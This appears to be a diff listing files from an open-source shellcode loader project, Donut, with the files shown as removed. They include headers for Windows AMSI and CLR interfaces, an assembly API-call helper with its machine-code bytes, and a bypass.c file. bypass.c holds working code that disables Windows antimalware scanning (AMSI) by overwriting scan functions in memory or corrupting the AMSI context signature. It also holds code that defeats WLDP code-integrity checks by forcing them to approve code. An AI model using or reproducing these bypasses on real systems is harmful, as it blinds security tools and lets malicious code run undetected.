77 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
78 IAmsiStream * This,
79 REFIID riid,
80 void **ppvObject);
81
82 ULONG ( STDMETHODCALLTYPE *AddRef )(
83 IAmsiStream * This);
84
85 ULONG ( STDMETHODCALLTYPE *Release )(
86 IAmsiStream * This);
87
88 HRESULT ( STDMETHODCALLTYPE *GetAttribute )(
89 IAmsiStream * This,
90 AMSI_ATTRIBUTE attribute,
91 ULONG dataSize,
92 unsigned char *data,
93 ULONG *retData);
94
95 HRESULT ( STDMETHODCALLTYPE *Read )(
96 IAmsiStream * This,
97 ULONGLONG position,
98 ULONG size,
99 unsigned char *buffer,
100 ULONG *readSize);
101
102 END_INTERFACE
103 } IAmsiStreamVtbl;
104
105 typedef struct _IAmsiStream {
106 IAmsiStreamVtbl *lpVtbl;
107 } AmsiStream;
108
109 typedef struct IAntimalwareProviderVtbl {
110 BEGIN_INTERFACE
111
112 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
113 IAntimalwareProvider * This,
114 REFIID riid,
115 void **ppvObject);
116
117 ULONG ( STDMETHODCALLTYPE *AddRef )(
118 IAntimalwareProvider * This);
119
120 ULONG ( STDMETHODCALLTYPE *Release )(
121 IAntimalwareProvider * This);
122
123 HRESULT ( STDMETHODCALLTYPE *Scan )(
124 IAntimalwareProvider * This,
125 IAmsiStream *stream,
126 AMSI_RESULT *result);
127
128 void ( STDMETHODCALLTYPE *CloseSession )(
129 IAntimalwareProvider * This,
130 ULONGLONG session);
131
132 HRESULT ( STDMETHODCALLTYPE *DisplayName )(
133 IAntimalwareProvider * This,
134 LPWSTR *displayName);
135
136 END_INTERFACE
137 } IAntimalwareProviderVtbl;
138
139 typedef struct _IAntimalwareProvider {
140 IAntimalwareProviderVtbl *lpVtbl;
141 } AntimalwareProvider;
142
143 typedef struct IAntimalwareVtbl {
144 BEGIN_INTERFACE
145
146 HRESULT ( STDMETHODCALLTYPE *QueryInterface)(
147 IAntimalware *This,
148 REFIID riid,
149 void **ppvObject);
150
151 ULONG ( STDMETHODCALLTYPE *AddRef )(
152 IAntimalware * This);
153
154 ULONG ( STDMETHODCALLTYPE *Release )(
155 IAntimalware * This);
156
157 HRESULT ( STDMETHODCALLTYPE *Scan )(
158 IAntimalware * This,
159 IAmsiStream *stream,
160 AMSI_RESULT *result,
161 IAntimalwareProvider **provider);
162
163 void ( STDMETHODCALLTYPE *CloseSession )(
164 IAntimalware * This,
165 ULONGLONG session);
166
167 END_INTERFACE
168 } IAntimalwareVtbl;
169
170 typedef struct _IAntimalware {
171 IAntimalwareVtbl *lpVtbl;
172 } Antimalware;
173
174 typedef struct tagHAMSICONTEXT {
175 DWORD Signature; // "AMSI" or 0x49534D41
176 PWCHAR AppName; // set by AmsiInitialize
177 IAntimalware *Antimalware; // set by AmsiInitialize
178 DWORD SessionCount; // increased by AmsiOpenSession
179 } _HAMSICONTEXT, *_PHAMSICONTEXT;
180
181 #endif
+0
-373
payload/bypass.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 typedef enum _WLDP_HOST_ID {
32 WLDP_HOST_ID_UNKNOWN = 0,
33 WLDP_HOST_ID_GLOBAL = 1,
34 WLDP_HOST_ID_VBA = 2,
35 WLDP_HOST_ID_WSH = 3,
36 WLDP_HOST_ID_POWERSHELL = 4,
37 WLDP_HOST_ID_IE = 5,
38 WLDP_HOST_ID_MSI = 6,
39 WLDP_HOST_ID_MAX = 7
40 } WLDP_HOST_ID, *PWLDP_HOST_ID;
41
42 typedef struct _WLDP_HOST_INFORMATION {
43 DWORD dwRevision;
44 WLDP_HOST_ID dwHostId;
45 PCWSTR szSource;
46 HANDLE hSource;
47 } WLDP_HOST_INFORMATION, *PWLDP_HOST_INFORMATION;
48
49 #if defined(BYPASS_AMSI_A)
50
51 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
52 HRESULT WINAPI AmsiScanBufferStub(
53 HAMSICONTEXT amsiContext,
54 PVOID buffer,
55 ULONG length,
56 LPCWSTR contentName,
57 HAMSISESSION amsiSession,
58 AMSI_RESULT *result)
59 {
60 *result = AMSI_RESULT_CLEAN;
61 return S_OK;
62 }
63
64 // This function is never called. It's simply used to calculate
65 // the length of AmsiScanBufferStub above.
66 //
67 // The reason it performs a multiplication is because MSVC can identify
68 // functions that perform the same operation and eliminate duplicates
69 // from the compiled code. Null subroutines are eliminated.
70
71 int AmsiScanBufferStubEnd(int a, int b) {
72 return a * b;
73 }
74
75 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
76 HRESULT WINAPI AmsiScanStringStub(
77 HAMSICONTEXT amsiContext,
78 LPCWSTR string,
79 LPCWSTR contentName,
80 HAMSISESSION amsiSession,
81 AMSI_RESULT *result)
82 {
83 *result = AMSI_RESULT_CLEAN;
84 return S_OK;
85 }
86
87 int AmsiScanStringStubEnd(int a, int b) {
88 return a + b;
89 }
90
91 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
92 HMODULE dll;
93 DWORD len, op, t;
94 LPVOID cs;
95
96 // try load amsi. if unable, assume DLL doesn't exist
97 // and return TRUE to indicate it's okay to continue
98 dll = inst->api.LoadLibraryA(inst->amsi.s);
99 if(dll == NULL) return TRUE;
100
101 // resolve address of AmsiScanBuffer. if not found,
102 // return FALSE because it should exist ...
103 cs = inst->api.GetProcAddress(dll, inst->amsiScanBuf);
104 if(cs == NULL) return FALSE;
105
106 // calculate length of stub
107 len = (ULONG_PTR)AmsiScanBufferStubEnd -
108 (ULONG_PTR)AmsiScanBufferStub;
109
110 DPRINT("Length of AmsiScanBufferStub is %" PRIi32 " bytes.", len);
111
112 // check for negative length. this would only happen when
113 // compiler decides to re-order functions.
114 if((int)len < 0) return FALSE;
115
116 // make the memory writeable. return FALSE on error
117 if(!inst->api.VirtualProtect(
118 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
119
120 DPRINT("Overwriting AmsiScanBuffer");
121 // over write with virtual address of stub
122 Memcpy(cs, ADR(PCHAR, AmsiScanBufferStub), len);
123 // set memory back to original protection
124 inst->api.VirtualProtect(cs, len, op, &t);
125
126 // resolve address of AmsiScanString. if not found,
127 // return FALSE because it should exist ...
128 cs = inst->api.GetProcAddress(dll, inst->amsiScanStr);
129 if(cs == NULL) return FALSE;
130
131 // calculate length of stub
132 len = (ULONG_PTR)AmsiScanStringStubEnd -
133 (ULONG_PTR)AmsiScanStringStub;
134
135 DPRINT("Length of AmsiScanStringStub is %" PRIi32 " bytes.", len);
136
137 // check for negative length. this would only happen when
138 // compiler decides to re-order functions.
139 if((int)len < 0) return FALSE;
140
141 // make the memory writeable
142 if(!inst->api.VirtualProtect(
143 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
144
145 DPRINT("Overwriting AmsiScanString");
146 // over write with virtual address of stub
147 Memcpy(cs, ADR(PCHAR, AmsiScanStringStub), len);
148 // set memory back to original protection
149 inst->api.VirtualProtect(cs, len, op, &t);
150
151 return TRUE;
152 }
153
154 #elif defined(BYPASS_AMSI_B)
155
156 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
157 HMODULE dll;
158 PBYTE cs;
159 DWORD i, op, t;
160 BOOL disabled = FALSE;
161 PDWORD Signature;
162
163 // try load amsi. if unable to load, assume
164 // it doesn't exist and return TRUE to indicate
165 // it's okay to continue.
166 dll = inst->api.LoadLibraryA(inst->amsi.s);
167 if(dll == NULL) return TRUE;
168
169 // resolve address of AmsiScanBuffer. if unable, return
170 // FALSE because it should exist.
171 cs = (PBYTE)inst->api.GetProcAddress(dll, inst->amsiScanBuf);
172 if(cs == NULL) return FALSE;
173
174 // scan for signature
175 for(i=0;;i++) {
176 Signature = (PDWORD)&cs[i];
177 // is it "AMSI"?
178 if(*Signature == inst->amsi.w[0]) {
179 // set memory protection for write access
180 inst->api.VirtualProtect(cs, sizeof(DWORD),
181 PAGE_EXECUTE_READWRITE, &op);
182
183 // change signature
184 *Signature++;
185
186 // set memory back to original protection
187 inst->api.VirtualProtect(cs, sizeof(DWORD), op, &t);
188 disabled = TRUE;
189 break;
190 }
191 }
192 return disabled;
193 }
194
195 #elif defined(BYPASS_AMSI_C)
196
197 // Attempt to find AMSI context in .data section of CLR.dll
198 // Could also scan PEB.ProcessHeap for this..
199 // Disabling AMSI via AMSI context is based on idea by Matt Graeber
200 // https://gist.github.com/mattifestation/ef0132ba4ae3cc136914da32a88106b9
201
202 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
203 LPVOID clr;
204 BOOL disabled = FALSE;
205 PIMAGE_DOS_HEADER dos;
206 PIMAGE_NT_HEADERS nt;
207 PIMAGE_SECTION_HEADER sh;
208 DWORD i, j, res;
209 PBYTE ds;
210 MEMORY_BASIC_INFORMATION mbi;
211 _PHAMSICONTEXT ctx;
212
213 // get address of CLR.dll. if unable, this
214 // probably isn't a dotnet assembly being loaded
215 clr = inst->api.GetModuleHandleA(inst->clr);
216 if(clr == NULL) return FALSE;
217
218 dos = (PIMAGE_DOS_HEADER)clr;
219 nt = RVA2VA(PIMAGE_NT_HEADERS, clr, dos->e_lfanew);
220 sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
221 nt->FileHeader.SizeOfOptionalHeader);
222
223 // scan all writeable segments while disabled == FALSE
224 for(i = 0;
225 i < nt->FileHeader.NumberOfSections && !disabled;
226 i++)
227 {
228 // if this section is writeable, assume it's data
229 if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
230 // scan section for pointers to the heap
231 ds = RVA2VA (PBYTE, clr, sh[i].VirtualAddress);
232
233 for(j = 0;
234 j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR);
235 j += sizeof(ULONG_PTR))
236 {
237 // get pointer
238 ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
239 // query if the pointer
240 res = inst->api.VirtualQuery((LPVOID)ptr, &mbi, sizeof(mbi));
241 if(res != sizeof(mbi)) continue;
242
243 // if it's a pointer to heap or stack
244 if ((mbi.State == MEM_COMMIT ) &&
245 (mbi.Type == MEM_PRIVATE ) &&
246 (mbi.Protect == PAGE_READWRITE))
247 {
248 ctx = (_PHAMSICONTEXT)ptr;
249 // check if it contains the signature
250 if(ctx->Signature == inst->amsi.w[0]) {
251 // corrupt it
252 ctx->Signature++;
253 disabled = TRUE;
254 break;
255 }
256 }
257 }
258 }
259 }
260 return disabled;
261 }
262
263 #elif defined(BYPASS_AMSI_D)
264 // This is where you may define your own AMSI bypass.
265 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_AMSI_C defined.
266
267 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
268
269 }
270
271 #endif
272
273 #if defined(BYPASS_WLDP_A)
274
275 // fake function that always returns S_OK and isApproved = TRUE
276 HRESULT WINAPI WldpIsClassInApprovedListStub(
277 REFCLSID classID,
278 PWLDP_HOST_INFORMATION hostInformation,
279 PBOOL isApproved,
280 DWORD optionalFlags)
281 {
282 *isApproved = TRUE;
283 return S_OK;
284 }
285
286 // make sure prototype is different from other null subroutines
287 // to avoid duplication by MSVC
288 int WldpIsClassInApprovedListStubEnd(int a, int b) {
289 return a - b;
290 }
291
292 // fake function that always returns S_OK
293 HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
294 HANDLE fileHandle,
295 PVOID baseImage,
296 ULONG ImageSize)
297 {
298 return S_OK;
299 }
300
301 int WldpQueryDynamicCodeTrustStubEnd(int a, int b) {
302 return a / b;
303 }
304
305 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
306 HMODULE wldp;
307 DWORD len, op, t;
308 LPVOID cs;
309
310 // try load wldp. if unable, assume DLL doesn't exist
311 // and return TRUE to indicate it's okay to continue
312 wldp = inst->api.LoadLibraryA(inst->wldp);
313 if(wldp == NULL) return TRUE;
314
315 // resolve address of WldpQueryDynamicCodeTrust
316 // if not found, return FALSE because it should exist
317 cs = inst->api.GetProcAddress(wldp, inst->wldpQuery);
318 if(cs == NULL) return FALSE;
319
320 // calculate length of stub
321 len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
322 (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
323
324 DPRINT("Length of WldpQueryDynamicCodeTrustStub is %" PRIi32 " bytes.", len);
325
326 // check for negative length. this would only happen when
327 // compiler decides to re-order functions.
328 if((int)len < 0) return FALSE;
329
330 // make the memory writeable. return FALSE on error
331 if(!inst->api.VirtualProtect(
332 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
333
334 // overwrite with virtual address of stub
335 Memcpy(cs, ADR(PCHAR, WldpQueryDynamicCodeTrustStub), len);
336 // set back to original protection
337 inst->api.VirtualProtect(cs, len, op, &t);
338
339 // resolve address of WldpIsClassInApprovedList
340 // if not found, return FALSE because it should exist
341 cs = inst->api.GetProcAddress(wldp, inst->wldpIsApproved);
342 if(cs == NULL) return FALSE;
343
344 // calculate length of stub
345 len = (ULONG_PTR)WldpIsClassInApprovedListStubEnd -
346 (ULONG_PTR)WldpIsClassInApprovedListStub;
347
348 DPRINT("Length of WldpIsClassInApprovedListStub is %" PRIi32 " bytes.", len);
349
350 // check for negative length. this would only happen when
351 // compiler decides to re-order functions.
352 if((int)len < 0) return FALSE;
353
354 // make the memory writeable. return FALSE on error
355 if(!inst->api.VirtualProtect(
356 cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
357
358 // overwrite with virtual address of stub
359 Memcpy(cs, ADR(PCHAR, WldpIsClassInApprovedListStub), len);
360 // set back to original protection
361 inst->api.VirtualProtect(cs, len, op, &t);
362
363 return TRUE;
364 }
365 #elif defined(BYPASS_WLDP_B)
366 // This is where you may define your own WLDP bypass.
367 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_WLDP_B defined.
368
369 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
370
371 }
372 #endif
+0
-121
payload/call_api.asm less more
0 ;
1 ; Copyright © 2019 TheWover, Odzhan. All Rights Reserved.
2 ;
3 ; Redistribution and use in source and binary forms, with or without
4 ; modification, are permitted provided that the following conditions are
5 ; met:
6 ;
7 ; 1. Redistributions of source code must retain the above copyright
8 ; notice, this list of conditions and the following disclaimer.
9 ;
10 ; 2. Redistributions in binary form must reproduce the above copyright
11 ; notice, this list of conditions and the following disclaimer in the
12 ; documentation and/or other materials provided with the distribution.
13 ;
14 ; 3. The name of the author may not be used to endorse or promote products
15 ; derived from this software without specific prior written permission.
16 ;
17 ; THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
18 ; IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
19 ; WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
20 ; DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
21 ; INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
22 ; (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 ; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
24 ; HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
25 ; STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
26 ; ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
27 ; POSSIBILITY OF SUCH DAMAGE.
28 ;
29 ;
30 ; void call_api(FARPROC api, int param_cnt, WCHAR param[]);
31
32 %define DONUT_MAX_PARAM 8
33 %define DONUT_MAX_NAME 256
34
35 struc HOME_SPACE
36 ._rcx resq 1
37 ._rdx resq 1
38 ._r8 resq 1
39 ._r9 resq 1
40 endstruc
41
42 struc _ds
43 .hs: resq HOME_SPACE_size
44
45 .arg4 resq 1
46 .arg5 resq 1
47 .arg6 resq 1
48 .arg7 resq 1
49
50 ._rdi resq 1
51 ._rsi resq 1
52 ._rbp resq 1
53 ._rbx resq 1
54 ._rsp resq 1
55 endstruc
56
57 %ifndef BIN
58 global call_api
59 global _call_api
60 %endif
61
62 call_api:
63 _call_api:
64 bits 32
65
66 ; int3
67
68 xor eax, eax ;
69 dec eax ;
70 jns L2 ; if SF=0, goto x64
71
72 mov eax, [esp+ 4] ; eax = api address
73 mov ecx, [esp+ 8] ; ecx = param_cnt
74 mov edx, [esp+12] ; edx = params
75 L1:
76 push edx ; save params[i] on stack
77 add edx, DONUT_MAX_NAME * 2 ; advance to next element
78 sub ecx, 1 ; subtract one from param_cnt
79 jnz L1
80 call eax ; call api
81 ret
82
83 L2:
84 bits 64
85
86 sub rsp, ((_ds_size & -16) + 16) - 8
87
88 mov [rsp+_ds._rbp], rbp
89 mov [rsp+_ds._rbx], rbx
90 mov [rsp+_ds._rdi], rdi
91 mov [rsp+_ds._rsi], rsi
92
93 mov rsi, rsp ; rsi = rsp after allocation
94 mov rdi, rcx ; rdi = api to call
95 mov eax, DONUT_MAX_NAME * 2
96
97 mov rcx, r8 ; rcx = param[0]
98 lea rdx, [rcx+rax] ; rdx = param[1]
99 lea r8, [rdx+rax] ; r8 = param[2]
100 lea r9, [r8+rax] ; r9 = param[3]
101
102 lea rbx, [r9+rax]
103 mov [rsp+_ds.arg4], rbx ; param[4]
104 add rbx, rax
105 mov [rsp+_ds.arg5], rbx ; param[5]
106 add rbx, rax
107 mov [rsp+_ds.arg6], rbx ; param[6]
108 add rbx, rax
109 mov [rsp+_ds.arg7], rbx ; param[7]
110 call rdi
111
112 mov rsp, rsi ; restore rsp after allocation
113 mov rsi, [rsp+_ds._rsi]
114 mov rdi, [rsp+_ds._rdi]
115 mov rbx, [rsp+_ds._rbx]
116 mov rbp, [rsp+_ds._rbp]
117
118 add rsp, ((_ds_size & -16) + 16) - 8
119 ret
120
+0
-50
payload/call_api_bin.h less more
0
1 unsigned int CALL_API_BIN[47];
2
3 CALL_API_BIN[0] = 0x7948C031;
4 CALL_API_BIN[1] = 0x24448B1B;
5 CALL_API_BIN[2] = 0x244C8B04;
6 CALL_API_BIN[3] = 0x24548B08;
7 CALL_API_BIN[4] = 0xC281520C;
8 CALL_API_BIN[5] = 0x00000200;
9 CALL_API_BIN[6] = 0x7501E983;
10 CALL_API_BIN[7] = 0xC3D0FFF4;
11 CALL_API_BIN[8] = 0x48EC8148;
12 CALL_API_BIN[9] = 0x48000001;
13 CALL_API_BIN[10] = 0x3024AC89;
14 CALL_API_BIN[11] = 0x48000001;
15 CALL_API_BIN[12] = 0x38249C89;
16 CALL_API_BIN[13] = 0x48000001;
17 CALL_API_BIN[14] = 0x2024BC89;
18 CALL_API_BIN[15] = 0x48000001;
19 CALL_API_BIN[16] = 0x2824B489;
20 CALL_API_BIN[17] = 0x48000001;
21 CALL_API_BIN[18] = 0x8948E689;
22 CALL_API_BIN[19] = 0x0200B8CF;
23 CALL_API_BIN[20] = 0x894C0000;
24 CALL_API_BIN[21] = 0x148D48C1;
25 CALL_API_BIN[22] = 0x048D4C01;
26 CALL_API_BIN[23] = 0x0C8D4D02;
27 CALL_API_BIN[24] = 0x1C8D4900;
28 CALL_API_BIN[25] = 0x9C894801;
29 CALL_API_BIN[26] = 0x00010024;
30 CALL_API_BIN[27] = 0xC3014800;
31 CALL_API_BIN[28] = 0x249C8948;
32 CALL_API_BIN[29] = 0x00000108;
33 CALL_API_BIN[30] = 0x48C30148;
34 CALL_API_BIN[31] = 0x10249C89;
35 CALL_API_BIN[32] = 0x48000001;
36 CALL_API_BIN[33] = 0x8948C301;
37 CALL_API_BIN[34] = 0x0118249C;
38 CALL_API_BIN[35] = 0xD7FF0000;
39 CALL_API_BIN[36] = 0x48F48948;
40 CALL_API_BIN[37] = 0x2824B48B;
41 CALL_API_BIN[38] = 0x48000001;
42 CALL_API_BIN[39] = 0x2024BC8B;
43 CALL_API_BIN[40] = 0x48000001;
44 CALL_API_BIN[41] = 0x38249C8B;
45 CALL_API_BIN[42] = 0x48000001;
46 CALL_API_BIN[43] = 0x3024AC8B;
47 CALL_API_BIN[44] = 0x48000001;
48 CALL_API_BIN[45] = 0x0148C481;
49 CALL_API_BIN[46] = 0x00C30000;
+0
-74
payload/clib.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <inttypes.h>
32 #include <stddef.h>
33
34 // functions to replace intrinsic C library functions
35
36 // funnily enough, MSVC still tries to replace this
37 // with memset hence the use of assembly..
38 void *Memset (void *ptr, int value, size_t num) {
39
40 #ifdef _MSC_VER
41 __stosb(ptr, value, num);
42 #else
43 unsigned char *p = (unsigned char*)ptr;
44
45 while(num--) {
46 *p = value;
47 p++;
48 }
49 #endif
50 return ptr;
51 }
52
53 void *Memcpy (void *destination, const void *source, size_t num) {
54 unsigned char *out = (unsigned char*)destination;
55 unsigned char *in = (unsigned char*)source;
56
57 while(num--) {
58 *out = *in;
59 out++; in++;
60 }
61 return destination;
62 }
63
64 int Memcmp(const void *ptr1, const void *ptr2, size_t num) {
65 register const unsigned char *s1 = (const unsigned char*)ptr1;
66 register const unsigned char *s2 = (const unsigned char*)ptr2;
67
68 while (num-- > 0) {
69 if (*s1++ != *s2++)
70 return s1[-1] < s2[-1] ? -1 : 1;
71 }
72 return 0;
73 }
+0
-916
payload/clr.h less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef CLR_H
32 #define CLR_H
33
34 typedef struct _ICLRMetaHost ICLRMetaHost;
35 typedef struct _ICLRRuntimeInfo ICLRRuntimeInfo;
36 typedef struct _ICorRuntimeHost ICorRuntimeHost;
37 typedef struct _ICorConfiguration ICorConfiguration;
38 typedef struct _IGCThreadControl IGCThreadControl;
39 typedef struct _IGCHostControl IGCHostControl;
40 typedef struct _IDebuggerThreadControl IDebuggerThreadControl;
41 typedef struct _AppDomain IAppDomain;
42 typedef struct _Assembly IAssembly;
43 typedef struct _Type IType;
44 typedef struct _Binder IBinder;
45 typedef struct _MethodInfo IMethodInfo;
46
47 typedef void *HDOMAINENUM;
48
49 typedef HRESULT ( __stdcall *CLRCreateInstanceFnPtr )(
50 REFCLSID clsid,
51 REFIID riid,
52 LPVOID *ppInterface);
53
54 typedef HRESULT ( __stdcall *CreateInterfaceFnPtr )(
55 REFCLSID clsid,
56 REFIID riid,
57 LPVOID *ppInterface);
58
59
60 typedef HRESULT ( __stdcall *CallbackThreadSetFnPtr )( void);
61
62 typedef HRESULT ( __stdcall *CallbackThreadUnsetFnPtr )( void);
63
64 typedef void ( __stdcall *RuntimeLoadedCallbackFnPtr )(
65 ICLRRuntimeInfo *pRuntimeInfo,
66 CallbackThreadSetFnPtr pfnCallbackThreadSet,
67 CallbackThreadUnsetFnPtr pfnCallbackThreadUnset);
68
69 #undef DUMMY_METHOD
70 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This)
71
72 typedef struct _BinderVtbl {
73 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
74 IBinder * This,
75 /* [in] */ REFIID riid,
76 /* [iid_is][out] */ void **ppvObject);
77
78 ULONG ( STDMETHODCALLTYPE *AddRef )(
79 IBinder * This);
80
81 ULONG ( STDMETHODCALLTYPE *Release )(
82 IBinder * This);
83
84 DUMMY_METHOD(GetTypeInfoCount);
85 DUMMY_METHOD(GetTypeInfo);
86 DUMMY_METHOD(GetIDsOfNames);
87 DUMMY_METHOD(Invoke);
88 DUMMY_METHOD(ToString);
89 DUMMY_METHOD(Equals);
90 DUMMY_METHOD(GetHashCode);
91 DUMMY_METHOD(GetType);
92 DUMMY_METHOD(BindToMethod);
93 DUMMY_METHOD(BindToField);
94 DUMMY_METHOD(SelectMethod);
95 DUMMY_METHOD(SelectProperty);
96 DUMMY_METHOD(ChangeType);
97 DUMMY_METHOD(ReorderArgumentArray);
98 } BinderVtbl;
99
100 typedef struct _Binder {
101 BinderVtbl *lpVtbl;
102 } Binder;
103
104 #undef DUMMY_METHOD
105 #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAppDomain *This)
106
107 typedef struct _AppDomainVtbl {
108 BEGIN_INTERFACE
109
110 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
111 IAppDomain * This,
112 /* [in] */ REFIID riid,
113 /* [iid_is][out] */ void **ppvObject);
114
115 ULONG ( STDMETHODCALLTYPE *AddRef )(
116 IAppDomain * This);
117
118 ULONG ( STDMETHODCALLTYPE *Release )(
119 IAppDomain * This);
120
121 DUMMY_METHOD(GetTypeInfoCount);
122 DUMMY_METHOD(GetTypeInfo);
123 DUMMY_METHOD(GetIDsOfNames);
124 DUMMY_METHOD(Invoke);
125
126 DUMMY_METHOD(ToString);
127 DUMMY_METHOD(Equals);
128 DUMMY_METHOD(GetHashCode);
129 DUMMY_METHOD(GetType);
130 DUMMY_METHOD(InitializeLifetimeService);
131 DUMMY_METHOD(GetLifetimeService);
132 DUMMY_METHOD(Evidence);
